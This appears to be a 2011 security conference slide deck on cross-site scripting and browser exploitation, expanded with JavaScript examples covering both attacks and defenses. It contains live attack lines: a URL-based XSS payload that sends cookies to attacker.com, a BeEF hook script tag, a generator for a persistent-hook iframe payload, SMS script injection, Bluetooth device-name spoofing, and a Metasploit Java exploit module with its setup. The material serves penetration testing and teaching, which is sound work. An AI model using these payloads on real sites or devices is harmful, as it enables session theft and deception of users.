www.taddong.com


Browser Exploitation for Fun and Profit Revolutions
(…in less than 24 hours)
Raúl Siles
raul@taddong.com
March 4, 2011

Copyright © 2011 Taddong S.L. All rights reserved.
Outline

     •  On previous episodes… (3rd in the series)
     •  XSS state-of-the-art (≈ WCI)
     •  “New” kind of XSS:
             –  Global (or URL-based) non-persistent XSS
     •  Multi-technology WCI on mobile devices
     •  Browser exploitation through XSS
             –  BeEF + Metasploit + attacker’s imagination
     •  References

On Previous Episodes…
     •  “Browser Exploitation for Fun & Profit”
             –  Target: Web browser (& its plug-ins)
             –  Web application pen-tester setup & Demos
             –  Samurai WTF & BeEF & Metasploit
         http://blog.taddong.com/2010/11/browser-exploitation-for-fun-profit.html
     •  “Browser Exploitation for Fun & Profit Reloaded”
             –  Most vulnerable applications of 2010: Java & Adobe
             –  Updating to the Ruby-based BeEF version
             –  Web browsing best practices
         http://blog.taddong.com/2010/12/browser-exploitation-for-fun-profit.html

XSS State-of-the-Art




Can My Browser Be Attacked?

     •  You only need to visit a single malicious web page… and be vulnerable to a single flaw… on your web browser or any of the installed plug-ins or add-ons… and …
     •  Drive-by-XSS
                (slide callouts: “Trusted websites attacking you”; “Lots of attack vectors… such as XSS”)

Cross-Site Scripting (XSS)



     •  XSS (JavaScript)
             –  Why not “web content injection” (WCI)?
             –  Others: HTML, images, Java, Flash, ActiveX…
     •  XSS types
             –  Non-persistent & Persistent & …
     •  Perceived risk/impact: low
             –  Both in the industry and in pen-test reports

Who is (not) vulnerable to XSS?




                                 (slide: xssed.com, the public archive of reported XSS)

“New” kind of XSS: Global (or URL-based) Non-Persistent XSS

Traditional XSS Protections

     •  Enforce input validation and output encoding on:
             –  GET & POST parameters
             –  HTTP headers

          GET /portal?lang=es&q=rootedcon&year=2011 HTTP/1.1
          Host: www.example.com
          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Encoding: gzip,deflate
          Referer: http://www.example.com/main
          ...

Target Web Application

     •  Initially discovered during a real web application pen-test in Spain
     •  Multi-language support web app
             –  The top HTML header includes links to the other languages (on every web page): URL
                 https://www.example.com/portal/ […params]

          <UL class=cabecera_idiomas>
          <LI><a href="https://www.example.com/portal/?lang=es">Bienvenidos</a></LI>
          <LI><a href="https://www.example.com/portal/?lang=en">Welcome</a></LI>
          ...</UL>

Global (or URL-based) non-persistent XSS (1)
     •  HTML or script injection after the “?”, without any parameter name at all
          https://www.example.com/portal/?"><script>document.location='https://www.attacker.com/triqui.php?c='+document.cookie</script>

     •  The script is reflected N times in the web page received as the response
             –  Once per language (by default)
     •  Same scenario before the “?” (in the URL path) or between parameters

Global (or URL-based) non-persistent XSS (2)
     •  Global: every web application resource (URL) is vulnerable to XSS
             –  Not tied to a specific HTTP parameter
             –  Better for the attacker:
                  •  Obfuscation (long URLs)
                  •  Social engineering
                  •  More damaging attacks (e.g. the web login page)
     •  Defenses: input validation and output encoding on everything, including the URL itself (path and query), not only on named parameters

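The reflection the two slides above describe, as an added JavaScript (Node) example that is not the audited application's code: a language-link builder that reuses the raw request target, the same builder hardened as the "Traditional XSS Protections" slide asks (validate the input, encode the output, and treat the URL itself as input), and the pen-tester's check that counts reflections. The /portal/ route, the lang, q and year parameters and the payload are taken from the slides; the site host, LANGUAGES, KNOWN_PATHS, ALLOWED_PARAMS and every function name are assumptions made for this example.

```javascript
// Added example (not the audited application's code). Models the language header
// from the slides: the vulnerable builder reuses the raw request target, the
// hardened one whitelists path and parameter names and encodes everything.
// LANGUAGES, KNOWN_PATHS, ALLOWED_PARAMS, SITE and the function names are assumptions.

const SITE = "https://www.example.com";
const LANGUAGES = [["es", "Bienvenidos"], ["en", "Welcome"]];
const KNOWN_PATHS = new Set(["/portal/"]);   // assumed route table
const ALLOWED_PARAMS = ["q", "year"];        // parameter names seen on the slides

// Constructed inputs: the legitimate request from the slides and the slide's payload.
const LEGIT = "/portal/?lang=es&q=rootedcon&year=2011";
const PAYLOAD = "/portal/?\"><script>document.location='https://www.attacker.com/triqui.php?c='+document.cookie</script>";

// Vulnerable: the raw request target (path + query, whatever the client sent) is
// reused for every language link. There is no "lang" parameter to validate:
// the URL itself is the input, and it is reflected once per language.
function languageLinksVulnerable(rawRequestTarget) {
  const base = rawRequestTarget.replace(/([?&])lang=[^&]*&?/, "$1").replace(/[?&]$/, "");
  const sep = base.includes("?") ? "&" : "?";
  return LANGUAGES
    .map(([code, label]) => `<li><a href="${SITE}${base}${sep}lang=${code}">${label}</a></li>`)
    .join("\n");
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: parse the request target, keep only a known path and known parameter
// names (input validation), rebuild the query with URLSearchParams (URL encoding)
// and HTML-encode the attribute value (output encoding). Nothing the client sent
// reaches the markup unencoded, including whatever follows the "?".
function languageLinksHardened(rawRequestTarget) {
  const url = new URL(rawRequestTarget, SITE);
  const path = KNOWN_PATHS.has(url.pathname) ? url.pathname : "/portal/";
  return LANGUAGES
    .map(([code, label]) => {
      const params = new URLSearchParams();
      for (const name of ALLOWED_PARAMS) {
        if (url.searchParams.has(name)) params.set(name, url.searchParams.get(name));
      }
      params.set("lang", code);
      const href = `${SITE}${path}?${params.toString()}`;
      return `<li><a href="${escapeHtml(href)}">${label}</a></li>`;
    })
    .join("\n");
}

// Pen-test check: count unencoded reflections of a marker in a response body.
// A count equal to the number of languages is the signature of this bug.
function countReflections(responseBody, marker) {
  return responseBody.split(marker).length - 1;
}
```

Run against PAYLOAD, the vulnerable builder reflects the script twice (one per language) while the hardened one emits plain `?lang=es` / `?lang=en` links; run against LEGIT, the hardened builder keeps q and year but with `&` encoded as `&amp;` inside the attribute.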
Multi-technology WCI (≈XSS) on Mobile Devices

XSS Everywhere


     •  XSS: the input is reflected in the output
             –  Immediately or “somewhere in time”
     •  Any input is a potential injection point, and so is any output
     •  Web content injection (≈XSS) through multiple technologies on mobile devices
             –  SMS and Bluetooth

                     What about… Wi-Fi, 2G/3G, etc.? (network name)

SMS


     •  Initially discovered on Palm webOS
             –  Open web sites, download files, install new root CA certs, turn off the radio, or wipe the device
                     http://intrepidusgroup.com/insight/webos/
     •  Extended to Windows Mobile & HTC
             –  Web-based SMS preview capabilities on HTC Windows Mobile smartphones (scripting)
                     •  http://www.securityfocus.com/archive/1/510897/30/
     •  Defenses: disable the preview or update

SMS on Windows Mobile 6.5
From: 666123666
To: 6001234567

Message (SMS):

<script>alert('Ejecucion de Javascript')</script>

(the alert text is Spanish for “JavaScript execution”; the SMS preview renders the message body as HTML and the script runs)

Bluetooth


     •  Discovered on Windows Mobile 6.1
             –  Native web-based GUI notification subsystem
     •  Bluetooth pairing and profile access
             –  Bluetooth authorization message (<=32 chars)
             –  Only HTML (no scripting): Blueline attacks
     •  Defenses: customized notification subsystem (vendor-based)
                                 http://www.hackingexposedwireless.com

Bluetooth on Windows Mobile 6.1



   # hciconfig hci0 name "<b>Ordenador</b> no peligro<i>so</i>"
     (device name reads “<b>Computer</b>, not dangero<i>us</i>”: the bold and italic tags are rendered in the pairing prompt, proving HTML injection)

   # hciconfig hci0 name "Mantener Bluetooth activo?<br><p"
     (device name reads “Keep Bluetooth on?<br><p”, exactly 32 characters: the unclosed <p tag hides whatever the real prompt says after the name, so the user answers the attacker's question instead)

Root Cause of the Problem

     •  Web content everywhere (or converted to it)
     •  Information displayed (GUI) via a web-based engine (HTML, JavaScript & more)

                                 (diagram labels: Databases, Web-App)

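The rendering path the SMS, Bluetooth and root-cause slides describe, as an added JavaScript example that is neither the vendor's notification code nor the slides' demo: a model notification engine that drops SMS bodies and Bluetooth device names into HTML templates, its fixed counterpart, and a rough model of what the user ends up reading. The payloads are the slides' own (translated in the comments); the templates, the 32-character cap taken from the Bluetooth slide, the sender number and every function name are assumptions made for this example. The point it adds to the slides: a length limit on the untrusted string is not a defense, because the attacker sizes the payload to the limit.

```javascript
// Added example (not the vendor's code). Models a "web-based GUI notification
// subsystem": strings from SMS bodies and Bluetooth device names are dropped into
// HTML. Templates, the 32-char cap and the function names are assumptions.

const BT_NAME_LIMIT = 32;   // the slide's "authorization message (<=32 chars)"

// Constructed inputs, taken from the slides.
const SMS_PAYLOAD = "<script>alert('Ejecucion de Javascript')</script>";  // "JavaScript execution"
const BT_NAME_FORMAT = "<b>Ordenador</b> no peligro<i>so</i>";            // "<b>Computer</b>, not dangero<i>us</i>"
const BT_NAME_SPOOF = "Mantener Bluetooth activo?<br><p";                 // "Keep Bluetooth on?<br><p", exactly 32 chars

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable renderers: untrusted text concatenated straight into markup that a
// web engine will parse. The length cap is the only "filter" applied.
function smsPreviewVulnerable(from, body) {
  return `<div class="preview"><b>${from}</b>: ${body}</div>`;
}
function pairingPromptVulnerable(deviceName) {
  const name = deviceName.slice(0, BT_NAME_LIMIT);
  return `<p>${name} wants to pair with this device. Allow?</p>`;
}

// Fixed renderers: same templates, every untrusted value HTML-encoded.
function smsPreviewFixed(from, body) {
  return `<div class="preview"><b>${escapeHtml(from)}</b>: ${escapeHtml(body)}</div>`;
}
function pairingPromptFixed(deviceName) {
  const name = escapeHtml(deviceName.slice(0, BT_NAME_LIMIT));
  return `<p>${name} wants to pair with this device. Allow?</p>`;
}

// Rough model of what the user reads: tags are dropped, an unclosed tag swallows
// everything up to the next ">" (or the end of the string), entities are decoded.
// An approximation of the HTML tokenizer, enough to show the effect of "<br><p".
function visibleText(html) {
  const entities = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#39;": "'" };
  return html
    .replace(/<[^>]*>/g, "")
    .replace(/<[^>]*$/, "")
    .replace(/&(amp|lt|gt|quot|#39);/g, (m) => entities[m])
    .trim();
}
```

With the spoof name, the vulnerable prompt shows only "Mantener Bluetooth activo?" (the real question vanishes inside the unclosed tag); the fixed prompt shows the raw `<br><p` as literal text followed by the real question, which is ugly but honest. The formatting name is cut to 32 characters (its closing `</i>` is lost) and still renders bold and italic, which is how the slide proves injection.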
Near Future Vulnerable Inputs

     •  Camera: Barcode or QR code reader, etc
     •  Microphone: HTML-based audio transcript




Browser Exploitation through XSS

Demonstrating XSS


     •  Most common example:
             –  Quick for XSS discovery, but…

                             <script>alert('XSS')</script>

             How to contribute to changing this general perception?

Live Demo




Exploiting Java
                                CVE-2010-0886
     •  All vulnerability details are in the previous episodes
             –  Java 6 Update 10 through 19 (10 <= x <= 19)
     •  “Do you know Rubén Santamarta?”
     •  Exploit requirements:
             –  Metasploit running as root (sudo)
             –  SMB not running on the pen-tester system, so the target falls back to WebDAV when it resolves the UNC path to the attacker's DLL
             –  WebClient (WebDAV Mini-Redirector) running on the target (on by default)
             –  WebDAV requires SRVPORT=80 and URIPATH=/ (BeEF is already listening there! Use different IP addresses for BeEF and Metasploit)
                exploit/windows/browser/java_ws_arginject_altjvm

BeEF Exploitation


     •  This is the only script the attacker needs to inject into the target web application (PHP version of BeEF):
          <script src="http://www.attacker.com/beef/hook/beefmagic.js"></script>

     •  Metasploit integration
     •  Persistent hooking (100% iframe)
             –  URL limitation (& favicon) – Yori Kvitchko
             –  Not on some mobile devices…

Persistent Hooking in Mobile Devices through URL Hiding
     •  URL hiding or address bar replacement
     •  UI spoofing Safari on the iPhone
             –  JavaScript pushes the real address bar up, off-screen
     •  Android too
            http://evil-lemur.com/mobile/
            http://software-security.sans.org/blog/2010/11/29/ui-spoofing-safari-iphone

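The hooking and persistence steps of the two BeEF slides above, as an added JavaScript example that is neither BeEF's code nor the slides' demo: the attacker side is what the injected script has to do to keep a hook alive across the victim's navigation (the "100% iframe", with the scrollTo trick that hides the mobile address bar), and the defender side is a scan of served HTML for the two tell-tales. The hook URL is the one on the slide (PHP BeEF); the target page sample, TRUSTED_ORIGIN and all function names are assumptions made for this example.

```javascript
// Added example (not BeEF's code, not the slides' demo). Attacker side: the
// persistence payload. Defender side: scan served HTML for injected hooks.
// TRUSTED_ORIGIN, CLEAN_PAGE and the function names are assumptions.

const HOOK_URL = "http://www.attacker.com/beef/hook/beefmagic.js";   // from the slide
const TRUSTED_ORIGIN = "https://www.example.com";

// Constructed sample of the target page (the language header from the slides).
const CLEAN_PAGE = [
  "<html><head><title>Portal</title>",
  `<script src="${TRUSTED_ORIGIN}/js/app.js"></script></head>`,
  '<body><ul class="cabecera_idiomas">',
  `<li><a href="${TRUSTED_ORIGIN}/portal/?lang=es">Bienvenidos</a></li>`,
  `<li><a href="${TRUSTED_ORIGIN}/portal/?lang=en">Welcome</a></li>`,
  "</ul></body></html>",
].join("\n");

// Attacker side. Injected through the XSS, this (1) loads the hook into the top
// document and (2) replaces the body with a full-window iframe of the clean URL.
// The victim keeps browsing inside the frame while the hooked top document never
// unloads, so the hook survives every click: persistent for the life of the tab,
// and only as long as the address bar (still showing the XSSed URL) goes unnoticed,
// the slide's "URL limitation". scrollTo(0, 1) pushes the real address bar off
// the screen on mobile browsers, the URL-hiding trick of the last slide.
function persistentHookPayload(hookUrl, cleanPageUrl) {
  const jsUrl = JSON.stringify(cleanPageUrl).replace(/</g, "\\u003c");  // keep "</script>" out of the inline script
  return [
    `<script src="${hookUrl}"></script>`,
    "<script>",
    "document.body.innerHTML = '';",
    "document.body.style.margin = '0';",
    "var f = document.createElement('iframe');",
    `f.src = ${jsUrl};`,
    "f.style.cssText = 'border:0;position:absolute;top:0;left:0;width:100%;height:100%';",
    "document.body.appendChild(f);",
    "window.scrollTo(0, 1);",
    "</script>",
  ].join("\n");
}

// Defender side: scan the HTML a server actually sent (WAF, page-integrity
// monitor, or a pen-tester verifying a proof of concept) for the tell-tales.
function findHookIndicators(html) {
  const findings = [];
  // 1. A script loaded from an origin other than the application's own.
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)) {
    const src = m[1];
    if (/^(https?:)?\/\//i.test(src) && !src.startsWith(TRUSTED_ORIGIN + "/")) {
      findings.push("external script: " + src);
    }
  }
  // 2. A full-window iframe, built from script or written as a tag.
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    if (/createElement\(\s*['"]iframe['"]\s*\)/.test(m[1]) && /100%/.test(m[1])) {
      findings.push("inline script builds a full-window iframe");
    }
  }
  if (/<iframe\b[^>]*100%[^>]*100%/i.test(html)) findings.push("static full-window iframe");
  return findings;
}

// The page as the victim's browser receives it after the injection.
function hookedPageSample() {
  return CLEAN_PAGE.replace(
    "</body>",
    persistentHookPayload(HOOK_URL, TRUSTED_ORIGIN + "/portal/?lang=es") + "\n</body>"
  );
}
```

The scan is deliberately simple (two regexes over the response body) and would miss a hook loaded from a same-origin file the attacker managed to plant, or an iframe sized by a stylesheet rather than inline; its value is that both tell-tales are visible in the bytes the server sends, which is where a proxy or integrity check can catch them.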
References

     •  Presentations in the Browser Exploitation for Fun
        & Profit Series: http://blog.taddong.com
     •  Samurai WTF (Web Testing Framework):
             –  http://sourceforge.net/projects/samurai/
     •  BeEF
             –  http://www.bindshell.net/tools/beef/
             –  https://code.google.com/p/beef/
     •  Metasploit Framework (MSF): (autopwn)
             –  http://www.metasploit.com
             –  http://www.metasploit.com/framework/modules/

Questions? 




www.taddong.com




Blog: blog.taddong.com
  Twitter: @taddong

  raul@taddong.com
